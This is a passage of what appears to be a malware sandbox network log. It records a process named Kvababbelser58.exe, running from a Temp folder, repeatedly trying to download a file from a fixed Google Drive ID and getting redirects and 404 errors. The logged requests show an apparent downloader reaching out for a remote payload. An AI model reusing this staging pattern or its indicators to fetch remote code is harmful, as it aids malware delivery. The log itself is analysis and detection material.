                                                                                                      2025-01-10 23:50:09 UTC1920INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:09 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: script-src 'nonce-STZiRxt5WP49yncyFrJZRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      9192.168.2.749978142.250.181.2254435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:10 UTC468OUTGET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:10 UTC1844INHTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgTBdrd6V48dOp4BS-iqdzaYtjYBLAIc5PwImhk5xogB7XM9Gc_n8nk-JUazgEx4x2ZF
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:10 GMT
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-lTC9gWrixil5kxVqTBJDWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:10 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 6b 6b 6d 4d 53 47 48 73 6b 73 53 78 53 52 61 38 6a 47 73 49 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tkkmMSGHsksSxSRa8jGsIQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      10192.168.2.749979216.58.206.464435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:11 UTC426OUTGET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:12 UTC1920INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:12 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-uv560dld1hIrqGfxxGnlFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      11192.168.2.749980142.250.181.2254435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:12 UTC468OUTGET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:13 UTC1851INHTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgQpt0l3MUuSkNT7nfm_Au9Z6434htwNXXNx0ZvmGP3odNFiLqxaSK351AuuZliWXe7HOJYwCws
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:13 GMT
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-lJ5eyAKr-mNs6yS5YfMxvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:13 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 64 5a 70 4e 32 4f 43 43 2d 59 45 36 5f 33 75 31 65 62 32 48 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="udZpN2OCC-YE6_3u1eb2HA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      12192.168.2.749981216.58.206.464435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:14 UTC426OUTGET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:14 UTC1920INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:14 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-fYr9K55YxkWABq6U3wA3uA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      13192.168.2.749982142.250.181.2254435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:15 UTC468OUTGET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:15 UTC1851INHTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgT1_rzEGtGYuznX4Czuy4FnlE165dYWccqrkEdeE_csXjBkfkcmT8CD5_mJU_v6WiPeK73lFZU
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:15 GMT
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy: script-src 'nonce-u8Kbn0lewygagNt_uCbuBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:15 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 59 33 38 57 35 38 66 46 59 7a 6a 61 6f 6e 30 46 41 6f 41 31 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gY38W58fFYzjaon0FAoA1w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      14192.168.2.749983216.58.206.464435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:16 UTC426OUTGET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:17 UTC1920INHTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:16 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-OSwiDDBTOgBPEN5eU1pgAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      15192.168.2.749984142.250.181.2254435912C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-10 23:50:17 UTC468OUTGET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:18 UTC1844INHTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgTPYGoK4rA3dvtot4T3Vu7NoRa4gPmnXIT49bifI0XhqnxjQteiAURvqRKidXGRyTvV
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:17 GMT
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy: script-src 'nonce-R9nLg3XsM-V8l1kl1d6MwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
